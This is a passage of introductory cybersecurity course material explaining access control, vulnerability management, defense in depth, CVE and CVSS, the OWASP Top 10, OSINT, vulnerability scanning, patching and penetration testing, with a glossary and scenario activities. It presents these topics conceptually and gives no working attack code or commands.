DAC is typically applied when a data owner decides appropriate levels of access. One example of DAC is
when the owner of a Google Drive folder shares editor, viewer, or commentor access with someone else.
Role-Based Access Control (RBAC)
RBAC is used when authorization is determined by a user's role within an organization. For example, a
user in the marketing department may have access to user analytics but not network administration.
Access control technologies
Users often experience authentication and authorization as a single, seamless experience. In large part,
that’s due to access control technologies that are configured to work together. These tools offer the
speed and automation needed by administrators to monitor and modify access rights. They also
decrease errors and potential risks.
An organization's IT department sometimes develops and maintains customized access control
technologies on their own. A typical IAM or AAA system consists of a user directory, a set of tools for
managing data in that directory, an authorization system, and an auditing system. Some organizations
create custom systems to tailor them to their security needs. However, building an in-house solution
comes at a steep cost of time and other resources.
Instead, many organizations opt to license third-party solutions that offer a suite of tools that enable
them to quickly secure their information systems. Keep in mind, security is about more than combining
a bunch of tools. It’s always important to configure these technologies so they can help to provide a
secure environment.
Key takeaways
Controlling access requires a collection of systems and tools. IAM and AAA are common frameworks for
implementing least privilege and separation of duties. As a security analyst, you might be responsible for
user provisioning and collaborating with other IAM or AAA teams. Having familiarity with these models
is valuable for helping organizations achieve their security objectives. They each ensure that the right
user is granted access to the right resources at the right time and for the right reasons.
Resources for more information
The identity and access management industry is growing at a rapid pace. As with other domains in
security, it’s important to stay informed.
●
IDPro© is a professional organization dedicated to sharing essential IAM industry knowledge.
Activity: Improve authentication, authorization, and accounting for a small
business
Scenario
Review the scenario below. Then complete the step-by-step instructions.
You’re the first cybersecurity professional hired by a growing business.
Recently, a deposit was made from the business to an unknown bank account. The finance
manager says they didn’t make a mistake. Fortunately, they were able to stop the payment.
The owner has asked you to investigate what happened to prevent any future incidents.
To do this, you’ll need to do some accounting on the incident to better understand what
happened. First, you will review the access log of the incident. Next, you will take notes that
can help you identify a possible threat actor. Then, you will spot issues with the access
controls that were exploited by the user. Finally, you will recommend mitigations that can
improve the business' access controls and reduce the likelihood that this incident reoccurs.
Glossary terms from week 2
Terms and definitions from Course 5, Week 2
Access controls: Security controls that manage access, authorization, and accountability of information
Algorithm: A set of rules used to solve a problem
Application programming interface (API) token: A small block of encrypted code that contains
information about a user
Asymmetric encryption: The use of a public and private key pair for encryption and decryption of data
Basic auth: The technology used to establish a user’s request to access a server
Bit: The smallest unit of data measurement on a computer
Brute force attack: The trial and error process of discovering private information
Cipher: An algorithm that encrypts information
Cryptographic key: A mechanism that decrypts ciphertext
Cryptography: The process of transforming information into a form that unintended readers can’t
understand
Data custodian: Anyone or anything that’s responsible for the safe handling, transport, and storage of
information
Data owner: The person that decides who can access, edit, use, or destroy their information
Digital certificate: A file that verifies the identity of a public key holder
Encryption: The process of converting data from a readable format to an encoded format
Hash collision: An instance when different inputs produce the same hash value
Hash function: An algorithm that produces a code that can’t be decrypted
Hash table: A data structure that's used to store and reference hash values
Identity and access management (IAM): A collection of processes and technologies that helps
organizations manage digital identities in their environment
Information privacy: The protection of unauthorized access and distribution of data
Multi-factor authentication (MFA): A security measure that requires a user to verify their identity in two
or more ways to access a system or network
Non-repudiation: The concept that the authenticity of information can’t be denied
OAuth: An open-standard authorization protocol that shares designated access between applications
Payment Card Industry Data Security Standards (PCI DSS): A set of security standards formed by major
organizations in the financial industry
Personally identifiable information (PII): Any information used to infer an individual's identity
Principle of least privilege: The concept of granting only the minimal access and authorization required
to complete a task or function
Protected health information (PHI): Information that relates to the past, present, or future physical or
mental health or condition of an individual
Public key infrastructure (PKI): An encryption framework that secures the exchange of online
information
Rainbow table: A file of pre-generated hash values and their associated plaintext
Salting: An additional safeguard that’s used to strengthen hash functions
Security assessment: A check to determine how resilient current security implementations against
threats
Security audit: A review of an organization's security controls, policies, and procedures against a set of
expectations
Security controls: Safeguards designed to reduce specific security risks
Separation of duties: The principle that users should not be given levels of authorization that would
allow them to misuse a system
Session: A sequence of network HTTP basic auth requests and responses associated with the same user
Session cookie: A token that websites use to validate a session and determine how long that session
should last
Session hijacking: An event when attackers obtain a legitimate user’s session ID
Session ID: A unique token that identifies a user and their device while accessing a system
Single Sign-On (SSO): A technology that combines several different logins into one
Symmetric encryption: The use of a single secret key to exchange information
User provisioning: The process of creating and maintaining a user's digital identity
Vulnerability Management
For every asset that needs protecting, there are dozens of vulnerabilities. Finding those
vulnerabilities and fixing them before they become a problem is the key to keep an asset safe. We've
already covered what a vulnerability is. Recall that a vulnerability is a weakness that can be
exploited by a threat. That word, can, is an important part of this description. Why is that? Let's
explore that together to find out more. Imagine I handed you an important document and asked you
to keep it safe. How would you do that? Some of you might first think about locking it up in a safe
place. Behind this is the understanding that, because documents can be easily moved, they are
vulnerable to theft. When other vulnerabilities come to mind, like how paper burns easily or
doesn't resist water, you might add other protections. Similar to this example, security teams plan
to protect assets according to their vulnerabilities and how they can be exploited. In security, an
exploit is a way of taking advantage of a vulnerability. Besides finding vulnerabilities, security
planning relies a lot on thinking of exploits. For example, there are burglars out there who want to
cause harm. Homes have vulnerable systems that can be exploited by a burglar. An example are the
windows. Glass is vulnerable to being broken. A burglar can exploit this vulnerability by using a
rock to break the window. Thinking of this vulnerability and exploit ahead of time allows us to plan
ahead. We can have an alarm system in place to scare the burglar away and alert the police. Security
teams spend a lot of time finding vulnerabilities and thinking of how they can be exploited. They do
this with the process known as vulnerability management. Vulnerability management is the process
of finding and patching vulnerabilities. Vulnerability management helps keep assets safe. It's a
method of stopping threats before they can become a problem. Vulnerability management is a four
step process. The first step is to identify vulnerabilities. The next step is to consider potential exploits
of those vulnerabilities. Third is to prepare defenses against threats. And finally, the fourth step is to
evaluate those defenses. When the last step ends, the process starts again. Vulnerability
management happens in a cycle. It's a regular part of what security teams do because there are
always new vulnerabilities to be concerned about. This is exactly why a diverse set of perspectives
is useful! Having a wide range of backgrounds and experiences only strengthens security teams and
their ability to find exploits. However, even large and diverse security teams can't keep track of
everything. New vulnerabilities are constantly being discovered. These are known as zero-day
exploits. A zero-day is an exploit that was previously unknown. The term zero-day refers to the fact
that the exploit is happening in real time with zero days to fix it. These kinds of exploits are
dangerous. They represent threats that haven't been planned for yet. For example, we can
anticipate the possibility of a burglar breaking into our home. We can plan for this type of threat by
having defenses in place, like locks on the doors and windows. A zero-day exploit would be
something totally unexpected, like the lock on the door falling off from intense heat. Zero-day
exploits are things that don't normally come to mind. For example, this might be a new form of
spyware infecting a popular website. When zero-day exploits happen, they can leave assets even
more vulnerable to threats than they already are. Vulnerability management is the process of
finding vulnerabilities and fixing their exploits. That's why the process is performed regularly at
most organizations. Perhaps the most important step of the process is identifying vulnerabilities.
Defense in depth strategy
A layered defense is difficult to penetrate. When one barrier fails, another takes its place
to stop an attack. Defense in depth is a security model that makes use of this concept. It's a layered
approach to vulnerability management that reduces risk. Defense in depth is commonly referred to
as the castle approach because it resembles the layered defenses of a castle. In the Middle Ages,
these structures were very difficult to penetrate. They featured different defenses, each unique in
its design, that posed different challenges for attackers. For example, a water-filled barrier called a
moat usually formed a circle around the castle, preventing threats like large groups of attackers
from reaching the castle walls. The few soldiers that made it past the first layer of defense were
then faced with a new challenge, giant stone walls. A vulnerability of
these structures were that they could be climbed. If attackers tried exploiting that weakness, guess
what? They were met with another layer of defense, watch towers, filled with defenders ready to
shoot arrows and keep them from climbing! Each level of defense of these medieval structures
minimized the risk of attacks by identifying vulnerabilities and implementing a security control
should one system fail. Defense in depth works in a similar way. The defense in depth concept can
be used to protect any asset. It's mainly used in cybersecurity to protect information using a five
layer design. Each layer features a number of security controls that protect information as it travels
in and out of the model. The first layer of defense in depth is the perimeter layer. This layer includes
some technologies that we've already explored, like usernames and passwords. Mainly, this is a user
authentication layer that filters external access. Its function is to only allow access to trusted
partners to reach the next layer of defense. Second, the network layer is more closely aligned with
authorization. The network layer is made up of other technologies like network firewalls and others.
Next, is the endpoint layer. Endpoints refer to the devices that have access on a network. They could
be devices like a laptop, desktop, or a server. Some examples of technologies that protect these
devices are anti-virus software. After that, we get to the application layer. This includes all the
interfaces that are used to interact with technology. At this layer, security measures are programmed
as part of an application. One common example is multi-factor authentication. You may be familiar
with having to enter both your password and a code sent by SMS. This is part of the application
layer of defense. And finally, the fifth layer of defense is the data layer. At this layer, we've arrived at
the critical data that must be protected, like personally identifiable information. One security
control that is important here in this final layer of defense is asset classification. Like I mentioned
earlier, information passes in and out of each of these five layers whenever it's exchanged over a
network. There are many more security
controls aside from the few that I mentioned that are part of the defense in depth model. A lot of
businesses design their security systems using the defense in-depth model. Understanding this
framework hopefully gives you a better sense of how an organization's security controls work
together to protect important assets.
Common vulnerabilities and exposures
We've discussed before that security is a team effort. Did you know the group extends well beyond
a single security team? Protecting information is a global effort! When it comes to
vulnerabilities, there are actually online public libraries. Individuals and organizations use them to
share and document common vulnerabilities and exposures. We've been focusing a lot on
vulnerabilities. Exposures are similar, but they have a key difference. While a vulnerability is
a weakness of a system, an exposure is a mistake that can be exploited by a threat. For example,
imagine you're asked to protect an important document. Documents are vulnerable to being
misplaced. If you laid the document down near an open window, it could be exposed to being blown
away. One of the most popular libraries of vulnerabilities and exposures is the CVE list. The
common vulnerabilities and exposures list, or CVE list, is an openly accessible dictionary of known
vulnerabilities and exposures. It is a popular resource. Many organizations use a CVE list to find
ways to improve their defenses. The CVE list was originally created by MITRE corporation in 1999.
MITRE is a collection of non-profit research and development centers. They're sponsored by the US
government. Their focus is on improving security technologies around the world. The main purpose
of the CVE list is to offer a standard way of identifying and categorizing known vulnerabilities and
exposures. Most CVEs in the list are reported by independent researchers, technology vendors, and
ethical hackers, but anyone can report one. Before a CVE can make it onto the CVE list, it first goes
through a strict review process by a CVE Numbering Authority, or CNA. A CNA is an organization
that volunteers to analyze and distribute information on eligible CVEs. All of these groups have an
established record of researching vulnerabilities and demonstrating security advisory capabilities.
When a vulnerability or exposure is reported to them, a rigorous testing process takes place. The
CVE list tests four criteria that a vulnerability must have before it's assigned an ID. First, it must be
independent of other issues. In other words, the vulnerability should be able to be fixed without
having to fix something else. Second, it must be recognized as a potential security risk by whoever
reports it. Third, the vulnerability must be submitted with supporting evidence. And finally, the
reported vulnerability can only affect one codebase, or in other words, only one program's source
code. For instance, the desktop version of Chrome may be vulnerable, but the Android application
may not be. If the reported flaw passes all of these tests, it is assigned a CVE ID. Vulnerabilities
added to the CVE list are often reviewed by other online vulnerability databases. These
organizations put them through additional tests to reveal how significant the flaws are and to
determine what kind of threat they pose. One of the most popular is the NIST National
Vulnerabilities Database. The NIST National Vulnerabilities Database uses what's known as the
common vulnerability scoring system, or CVSS, which is a measurement system that scores the
severity of a vulnerability. Security teams use CVSS as a way of calculating the impact a
vulnerability could have on a system. They also use them to determine how quickly a vulnerability
should be patched. The NIST National Vulnerabilities Database provides a base score of CVEs on a
scale of 0-10. Base scores reflect the moment a vulnerability is evaluated, so they don't change over
time. In general, a CVSS that scores below a 4.0 is considered to be low risk and doesn't require
immediate attention. However, anything above a 9.0 is considered to be a critical risk to company
assets that should be addressed right away. Security teams commonly use the CVE list and CVSS
scores as part of their vulnerability management strategy. These references provide
recommendations for prioritizing security fixes, like installing software updates before patches.
Libraries like the CVE list, help organizations answer questions. Is a vulnerability dangerous to our
business? If so, how soon should we address it? These online libraries bring together diverse
perspectives from across the world. Contributing to this effort is one of my favorite parts of
working in this field. Keep gaining experience, and I hope you'll participate too!
The OWASP Top 10
To prepare for future risks, security professionals need to stay informed. Previously, you learned about
the CVE® list, an openly accessible dictionary of known vulnerabilities and exposures. The CVE® list is
an important source of information that the global security community uses to share information with
each other.
In this reading, you’ll learn about another important resource that security professionals reference, the
Open Web Application Security Project, recently renamed Open Worldwide Application Security
Project® (OWASP). You’ll learn about OWASP’s role in the global security community and how
companies use this resource to focus their efforts.
What is OWASP?
OWASP is a nonprofit foundation that works to improve the security of software. OWASP is an open
platform that security professionals from around the world use to share information, tools, and events
that are focused on securing the web.
The OWASP Top 10
One of OWASP’s most valuable resources is the OWASP Top 10. The organization has published this list
since 2003 as a way to spread awareness of the web’s most targeted vulnerabilities. The Top 10 mainly
applies to new or custom made software. Many of the world's largest organizations reference the
OWASP Top 10 during application development to help ensure their programs address common
security mistakes.
Pro tip: OWASP’s Top 10 is updated every few years as technologies evolve. Rankings are based on how
often the vulnerabilities are discovered and the level of risk they present.
Note: Auditors also use the OWASP Top 10 as one point of reference when checking for regulatory
compliance.
Common vulnerabilities
Businesses often make critical security decisions based on the vulnerabilities listed in the OWASP Top
10. This resource influences how businesses design new software that will be on their network, unlike
the CVE® list, which helps them identify improvements to existing programs. These are the most
regularly listed vulnerabilities that appear in their rankings to know about:
Broken access control
Access controls limit what users can do in a web application. For example, a blog might allow visitors to
post comments on a recent article but restricts them from deleting the article entirely. Failures in these
mechanisms can lead to unauthorized information disclosure, modification, or destruction. They can
also give someone unauthorized access to other business applications.
Cryptographic failures
Information is one of the most important assets businesses need to protect. Privacy laws such as General
Data Protection Regulation (GDPR) require sensitive data to be protected by effective encryption
methods. Vulnerabilities can occur when businesses fail to encrypt things like personally identifiable
information (PII). For example, if a web application uses a weak hashing algorithm, like MD5, it’s more
at risk of suffering a data breach.
Injection
Injection occurs when malicious code is inserted into a vulnerable application. Although the app appears
to work normally, it does things that it wasn’t intended to do. Injection attacks can give threat actors a
backdoor into an organization’s information system. A common target is a website’s login form. When
these forms are vulnerable to injection, attackers can insert malicious code that gives them access to
modify or steal user credentials.
Insecure design
Applications should be designed in such a way that makes them resilient to attack. When they aren’t,
they’re much more vulnerable to threats like injection attacks or malware infections. Insecure design
refers to a wide range of missing or poorly implemented security controls that should have been
programmed into an application when it was being developed.
Security misconfiguration
Misconfigurations occur when security settings aren’t properly set or maintained. Companies use a
variety of different interconnected systems. Mistakes often happen when those systems aren’t properly
set up or audited. A common example is when businesses deploy equipment, like a network server,
using default settings. This can lead businesses to use settings that fail to address the organization's
security objectives.
Vulnerable and outdated components
Vulnerable and outdated components is a category that mainly relates to application development.
Instead of coding everything from scratch, most developers use open-source libraries to complete their
projects faster and easier. This publicly available software is maintained by communities of
programmers on a volunteer basis. Applications that use vulnerable components that have not been
maintained are at greater risk of being exploited by threat actors.
Identification and authentication failures
Identification is the keyword in this vulnerability category. When applications fail to recognize who
should have access and what they’re authorized to do, it can lead to serious problems. For example, a
home Wi-Fi router normally uses a simple login form to keep unwanted guests off the network. If this
defense fails, an attacker can invade the homeowner’s privacy.
Software and data integrity failures
Software and data integrity failures are instances when updates or patches are inadequately reviewed
before implementation. Attackers might exploit these weaknesses to deliver malicious software. When
that occurs, there can be serious downstream effects. Third parties are likely to become infected if a
single system is compromised, an event known as a supply chain attack.
A famous example of a supply chain attack is the SolarWinds cyber attack (2020) where hackers injected
malicious code into software updates that the company unknowingly released to their customers.
Security logging and monitoring failures
In security, it’s important to be able to log and trace back events. Having a record of events like user
login attempts is critical to finding and fixing problems. Sufficient monitoring and incident response is
equally important.
Server-side request forgery
Companies have public and private information stored on web servers. When you use a hyperlink or
click a button on a website, a request is sent to a server that should validate who you are, fetch the
appropriate data, and then return it to you.
Server-side request forgeries (SSRFs) are when attackers manipulate the normal operations of a server
to read or update other resources on that server. These are possible when an application on the server is
vulnerable. Malicious code can be carried by the vulnerable app to the host server that will fetch
unauthorized data.
Key takeaways
Staying informed and maintaining awareness about the latest cybersecurity trends can be a useful way
to help defend against attacks and prepare for future risks in your security career. OWASP’s Top 10 is a
useful resource where you can learn more about these vulnerabilities.
Open source intelligence
Cyber attacks can sometimes be prevented with the right information, which starts with knowing where
your systems are vulnerable. Previously, you learned that the CVE® list and scanning tools are two
useful ways of finding weaknesses. But, there are other ways to identify vulnerabilities and threats.
In this reading, you’ll learn about open-source intelligence, commonly known as OSINT. OSINT is the
collection and analysis of information from publicly available sources to generate usable intelligence. It's
commonly used to support cybersecurity activities, like identifying potential threats and vulnerabilities.
You'll learn why open-source intelligence is gathered and how it can improve cybersecurity. You’ll also
learn about commonly used resources and tools for gathering information and intelligence.
Information vs intelligence
The terms intelligence and information are often used interchangeably, making it easy to mix them up.
Both are important aspects of cybersecurity that differ in their focus and objectives.
Information refers to the collection of raw data or facts about a specific subject. Intelligence, on the
other hand, refers to the analysis of information to produce knowledge or insights that can be used to
support decision-making.
For example, new information might be released about an update to the operating system (OS) that's
installed on your organization's workstations. Later, you might find that new cyber threats have been
linked to this new update by researching multiple cybersecurity news resources. The analysis of this
information can be used as intelligence to guide your organization's decision about installing the OS
updates on employee workstations.
In other words, intelligence is derived from information through the process of analysis, interpretation,
and integration. Gathering information and intelligence are both important aspects of cybersecurity.
Intelligence improves decision-making
Businesses often use information to gain insights into the behavior of their customers. Insights, or
intelligence, can then be used to improve their decision making. In security, open-source information is
used in a similar way to gain insights into threats and vulnerabilities that can pose risks to an
organization.
OSINT plays a significant role in information security (InfoSec), which is the practice of keeping data in
all states away from unauthorized users.
For example, a company's InfoSec team is responsible for protecting their network from potential
threats. They might utilize OSINT to monitor online forums and hacker communities for discussions
about emerging vulnerabilities. If they come across a forum post discussing a newly discovered
weakness in a popular software that the company uses, the team can quickly assess the risk, prioritize
patching efforts, and implement necessary safeguards to prevent an attack.
Here are some of the ways OSINT can be used to generate intelligence:
●
●
●
●
To provide insights into cyber attacks
To detect potential data exposures
To evaluate existing defenses
To identify unknown vulnerabilities
Collecting intelligence is sometimes part of the vulnerability management process. Security teams might
use OSINT to develop profiles of potential targets and make data driven decisions on improving their
defenses.
OSINT tools
There's an enormous amount of open-source information online. Finding relevant information that can
be used to gather intelligence is a challenge. Information can be gathered from a variety of sources, such
as search engines, social media, discussion boards, blogs, and more. Several tools also exist that can be
used in your intelligence gathering process. Here are just a few examples of tools that you can explore:
●
●
●
●
VirusTotal is a service that allows anyone to analyze suspicious files, domains, URLs, and IP
addresses for malicious content.
MITRE ATT&CK® is a knowledge base of adversary tactics and techniques based on real-world
observations.
OSINT Framework is a web-based interface where you can find OSINT tools for almost any kind
of source or platform.
Have I been Pwned is a tool that can be used to search for breached email accounts.
There are numerous other OSINT tools that can be used to find specific types of information. Remember,
information can be gathered from a variety of sources. Ultimately, it's your responsibility to thoroughly
research any available information that's relevant to the problem you’re trying to solve.
Key takeaways
Gathering information and intelligence are important aspects of cybersecurity. OSINT is used to make
evidence-based decisions that can be used to prevent attacks. There’s so much information available,
which is why it's important for security professionals to be skilled with searching for information.
Having familiarity with popular OSINT tools and resources will make your research easier when
gathering information and collecting intelligence.
Vulnerability assessments
Our exploration of the vulnerability management process so far has been focused on a couple of
topics. We've discussed how vulnerabilities influence the design of defenses. We've also talked
about how common vulnerabilities are shared. A topic we're yet to cover is how vulnerabilities are
found in the first place. Weaknesses and flaws are generally found during a
vulnerability assessment. A vulnerability assessment is the internal review process of an
organization's security systems. These assessments work like the process of identifying and
categorizing vulnerabilities on the CVE list. The main difference is the organization's security team
performs, evaluates, scores, and fixes them on their own. Security analysts play a key role
throughout this process. Overall, the goal of a vulnerability assessment is to identify weak points
and prevent attacks. They're also how security teams determine whether their security controls
meet regulatory standards. Organizations perform vulnerability assessments a lot. Because
companies have so many assets to protect, security teams sometimes need to select which area to
focus on through vulnerability assessments. Once they decide what to focus on, vulnerability
assessments typically follow a four-step process. The first step is identification. Here, scanning tools
and manual testing are used to find vulnerabilities. During the identification step, the goal is to
understand the current state of a security system, like taking a picture of it. Many findings usually
appear after identification. The next step of the process is vulnerability analysis. During this step,
each of the vulnerabilities that were identified are tested. By being a digital detective, the goal of
vulnerability analysis is to find the source of the problem. The third step of the process is risk
assessment. During this step of the process, a score is assigned to each vulnerability. This score is
assigned based on two factors: how severe the impact would be if the vulnerability were to be
exploited and the likelihood of this happening. Vulnerabilities uncovered during the first two steps
of this process often outnumber the people available to fix them. Risk assessments are a way of
prioritizing resources to handle the vulnerabilities that need to be addressed based on their score.
The fourth and final step of vulnerability assessment is remediation. It's during this step that the
vulnerabilities that can impact the organization are addressed. Remediation occurs depending on
the severity score assigned during the risk assessment step. This part of the process is normally a
joint effort between the security staff and IT teams to come up with the best approach to fixing the
vulnerabilities that were uncovered earlier. Examples of remediation steps might include things
like enforcing new security procedures, updating operating systems, or implementing system
patches. Vulnerability assessments are great for identifying the flaws of a system. Most
organizations use them to search for problems before they happen. But how do we know where to
search? When we get together again, we'll explore how companies figure this out.
Approaches to vulnerability scanning
Previously, you learned about a vulnerability assessment, which is the internal review process of an
organization's security systems. An organization performs vulnerability assessments to identify
weaknesses and prevent attacks. Vulnerability scanning tools are commonly used to simulate threats by
finding vulnerabilities in an attack surface. They also help security teams take proactive steps towards
implementing their remediation strategy.
Vulnerability scanners are important tools that you'll likely use in the field. In this reading, you’ll explore
how vulnerability scanners work and the types of scans they can perform.
What is a vulnerability scanner?
A vulnerability scanner is software that automatically compares known vulnerabilities and exposures
against the technologies on the network. In general, these tools scan systems to find misconfigurations
or programming flaws.
Scanning tools are used to analyze each of the five attack surfaces that you learned about in the video
about the defense in depth strategy:
1.
2.
3.
4.
5.
Perimeter layer, like authentication systems that validate user access
Network layer, which is made up of technologies like network firewalls and others
Endpoint layer, which describes devices on a network, like laptops, desktops, or servers
Application layer, which involves the software that users interact with
Data layer, which includes any information that’s stored, in transit, or in use
When a scan of any layer begins, the scanning tool compares the findings against databases of security
threats. At the end of the scan, the tool flags any vulnerabilities that it finds and adds them to its
reference database. Each scan adds more information to the database, helping the tool be more accurate
in its analysis.
Note: Vulnerability databases are also routinely updated by the company that designed the scanning
software.
Performing scans
Vulnerability scanners are meant to be non-intrusive. Meaning, they don’t break or take advantage of a
system like an attacker would. Instead, they simply scan a surface and alert you to any potentially
unlocked doors in your systems.
Note: While vulnerability scanners are non-intrusive, there are instances when a scan can inadvertently
cause issues, like crash a system.
There are a few different ways that these tools are used to scan a surface. Each approach corresponds to
the pathway a threat actor might take. Next, you can explore each type of scan to get a clearer picture of
this.
External vs. internal
External and internal scans simulate an attacker's approach.
External scans test the perimeter layer outside of the internal network. They analyze outward facing
systems, like websites and firewalls. These kinds of scans can uncover vulnerable things like vulnerable
network ports or servers.
Internal scans start from the opposite end by examining an organization's internal systems. For
example, this type of scan might analyze application software for weaknesses in how it handles user
input.
Authenticated vs. unauthenticated
Authenticated and unauthenticated scans simulate whether or not a user has access to a system.
Authenticated scans might test a system by logging in with a real user account or even with an admin
account. These service accounts are used to check for vulnerabilities, like broken access controls.
Unauthenticated scans simulate external threat actors that do not have access to your business
resources. For example, a scan might analyze file shares within the organization that are used to house
internal-only documents. Unauthenticated users should receive "access denied" results if they tried
opening these files. However, a vulnerability would be identified if you were able to access a file.
Limited vs. comprehensive
Limited and comprehensive scans focus on particular devices that are accessed by internal and external
users.
Limited scans analyze particular devices on a network, like searching for misconfigurations on a
firewall.
Comprehensive scans analyze all devices connected to a network. This includes operating systems, user
databases, and more.
Pro tip: Discovery scanning should be done prior to limited or comprehensive scans. Discovery scanning
is used to get an idea of the computers, devices, and open ports that are on a network.
Key takeaways
Finding vulnerabilities requires thinking of all possibilities. Vulnerability scans vary depending on the
surfaces that an organization is evaluating. Usually, seasoned security professionals lead the effort of
configuring and performing these types of scans to create a profile of a company’s security posture.
However, analysts also play an important role in the process. The results of a vulnerability scan often
lead to renewed compliance efforts, procedural changes, and system patching. Understanding the
objectives of common types of vulnerability scans will help you participate in these proactive security
exercises whenever possible.
Tip: To explore vulnerability scanner software commonly used in the cybersecurity industry, in your
preferred browser enter search terms like “popular vulnerability scanner software” and/or “open
source vulnerability scanner software used in cybersecurity”.
The importance of updates
At some point in time, you may have wondered, “Why do my devices constantly need updating?” For
consumers, updates provide improvements to performance, stability, and even new features! But from a
security standpoint, they serve a specific purpose. Updates allow organizations to address security
vulnerabilities that can place their users, devices, and networks at risk.
In a video, you learned that updates fit into every security team’s remediation strategy. They usually
take place after a vulnerability assessment, which is the internal review process of an organization's
security systems. In this reading, you’ll learn what updates do, how they’re delivered, and why they’re
important to cybersecurity.
Patching gaps in security
An outdated computer is a lot like a house with unlocked doors. Malicious actors use these gaps in
security the same way, to gain unauthorized access. Software updates are similar to locking the doors to
keep them out.
A patch update is a software and operating system update that addresses security vulnerabilities within
a program or product. Patches usually contain bug fixes that address common security vulnerabilities
and exposures.
Note: Ideally, patches address common vulnerabilities and exposures before malicious hackers find
them. However, patches are sometimes developed as a result of a zero-day, which is an exploit that was
previously unknown.
Common update strategies
When software updates become available, clients and users have two installation options:
●
●
Manual updates
Automatic updates
As you’ll learn, each strategy has both benefits and disadvantages.
Manual updates
A manual deployment strategy relies on IT departments or users obtaining updates from the developers.
Home office or small business environments might require you to find, download, and install updates
yourself. In enterprise settings, the process is usually handled with a configuration management tool.
These tools offer a range of options to deploy updates, like to all clients on your network or a select
group of users.
Advantage: An advantage of manual update deployment strategies is control. That can be useful if
software updates are not thoroughly tested by developers, leading to instability issues.
Disadvantage: A drawback to manual update deployments is that critical updates can be forgotten or
disregarded entirely.
Automatic updates
An automatic deployment strategy takes the opposite approach. With this option, finding, downloading,
and installing updates can be done by the system or application.
Pro tip: The Cybersecurity and Infrastructure Security Agency (CISA) recommends using automatic
options whenever they’re available.
Certain permissions need to be enabled by users or IT groups before updates can be installed, or pushed,
when they're available. It is up to the developers to adequately test their patches before release.
Advantage: An advantage to automatic updates is that the deployment process is simplified. It also keeps
systems and software current with the latest, critical patches.
Disadvantage: A drawback to automatic updates is that instability issues can occur if the patches were
not thoroughly tested by the vendor. This can result in performance problems and a poor user
experience.
End-of-life software
Sometimes updates are not available for a certain type of software known as end-of-life (EOL) software.
All software has a lifecycle. It begins when it’s produced and ends when a newer version is released. At
that point, developers must allocate resources to the newer versions, which leads to EOL software.
While the older software is still useful, the manufacturer no longer supports it.
Note: Patches and updates are very different from upgrades. Upgrades refer to completely new versions
of hardware or software that can be purchased.
CISA recommends discontinuing the use of EOL software because it poses an unfixable risk to systems.
But, this recommendation is not always followed. Replacing EOL technology can be costly for businesses
and individual users.
The risks that EOL software presents continues to grow as more connected devices enter the
marketplace. For example, there are billions of Internet of Things (IoT) devices, like smart light bulbs,
connected to home and work networks. In some business settings, all an attacker needs is a single
unpatched device to gain access to the network and cause problems.
Key takeaways
Updating software and patching vulnerabilities is an important practice that everyone should
participate in. Unfortunately, that’s not always the case. Many of the biggest cyber attacks in the world
might have been prevented if systems were kept updated. One example is the WannaCry attack of 2017.
The attack affected computers in more than 150 countries and caused an estimated $4 billion dollars in
damages. Researchers have since found that WannaCry could have been prevented if the infected
systems were up-to-date with a security patch that was made available months before the attack.
Keeping software updated requires effort. However, the benefits they provide make them worthwhile.
Penetration testing
An effective security plan relies on regular testing to find an organization's weaknesses. Previously, you
learned that vulnerability assessments, the internal review process of an organization's security systems,
are used to design defense strategies based on system weaknesses. In this reading, you'll learn how
security teams evaluate the effectiveness of their defenses using penetration testing.
Penetration testing
A penetration test, or pen test, is a simulated attack that helps identify vulnerabilities in systems,
networks, websites, applications, and processes. The simulated attack in a pen test involves using the
same tools and techniques as malicious actors in order to mimic a real life attack. Since a pen test is an
authorized attack, it is considered to be a form of ethical hacking. Unlike a vulnerability assessment that
finds weaknesses in a system's security, a pen test exploits those weaknesses to determine the potential
consequences if the system breaks or gets broken into by a threat actor.
For example, the cybersecurity team at a financial company might simulate an attack on their banking
app to determine if there are weaknesses that would allow an attacker to steal customer information or
illegally transfer funds. If the pen test uncovers misconfigurations, the team can address them and
improve the overall security of the app.
Note: Organizations that are regulated by PCI DSS, HIPAA, or GDPR must routinely perform penetration
testing to maintain compliance standards.
Learning from varied perspectives
These authorized attacks are performed by pen testers who are skilled in programming and network
architecture. Depending on their objectives, organizations might use a few different approaches to
penetration testing:
●
●
●
Red team tests simulate attacks to identify vulnerabilities in systems, networks, or applications.
Blue team tests focus on defense and incident response to validate an organization's existing
security systems.
Purple team tests are collaborative, focusing on improving the security posture of the
organization by combining elements of red and blue team exercises.
Red team tests are commonly performed by independent pen testers who are hired to evaluate internal
systems. Although, cybersecurity teams may also have their own pen testing experts. Regardless of the
approach, penetration testers must make an important decision before simulating an attack: How much
access and information do I need?
Penetration testing strategies
There are three common penetration testing strategies:
●
●
●
Open-box testing is when the tester has the same privileged access that an internal developer
would have—information like system architecture, data flow, and network diagrams. This
strategy goes by several different names, including internal, full knowledge, white-box, and
clear-box penetration testing.
Closed-box testing is when the tester has little to no access to internal systems—similar to a
malicious hacker. This strategy is sometimes referred to as external, black-box, or zero
knowledge penetration testing.
Partial knowledge testing is when the tester has limited access and knowledge of an internal
system—for example, a customer service representative. This strategy is also known as graybox testing.
Closed box testers tend to produce the most accurate simulations of a real-world attack. Nevertheless,
each strategy produces valuable results by demonstrating how an attacker might infiltrate a system and
what information they could access.
Becoming a penetration tester
Penetration testers are in-demand in the fast growing field of cybersecurity. All of the skills you’re
learning in this program can help you advance towards a career in pen testing:
●
●
●
●
●
●
Network and application security
Experience with operating systems, like Linux
Vulnerability analysis and threat modeling
Detection and response tools
Programming languages, like Python and BASH
Communication skills
Programming skills are very helpful in penetration testing because it's often performed on software and
IT systems. With enough practice and dedication, cybersecurity professionals at any level can develop
the skills needed to be a pen tester.
Bug bounty programs
Organization’s commonly run bug bounty programs which offer freelance pen testers financial rewards
for finding and reporting vulnerabilities in their products. Bug bounties are great opportunities for
amateur security professionals to participate and grow their skills.
Pro tip: HackerOne is a community of ethical hackers where you can find active bug bounties to
participate in.
Key takeaways
A major risk for organizations is malicious hackers breaking into their systems. Penetration testing is
another way for organizations to secure their systems. Security teams use these simulated attacks to get
a clearer picture of weaknesses in their defenses. There’s a growing need for specialized security
professionals in this field. Even if you start out assisting with these activities, there’s plenty of
opportunities to grow and learn the skills to be a pen tester.
Portfolio Activity: Analyze a vulnerable system for a small business
Scenario
Review the following scenario. Then complete the step-by-step instructions.
You are a newly hired cybersecurity analyst for an e-commerce company. The company
stores information on a remote database server since many of the employees work
remotely from locations all around the world. Employees of the company regularly query,
or request, data from the server to find potential customers. The database has been open to
the public since the company's launch three years ago. As a cybersecurity professional, you
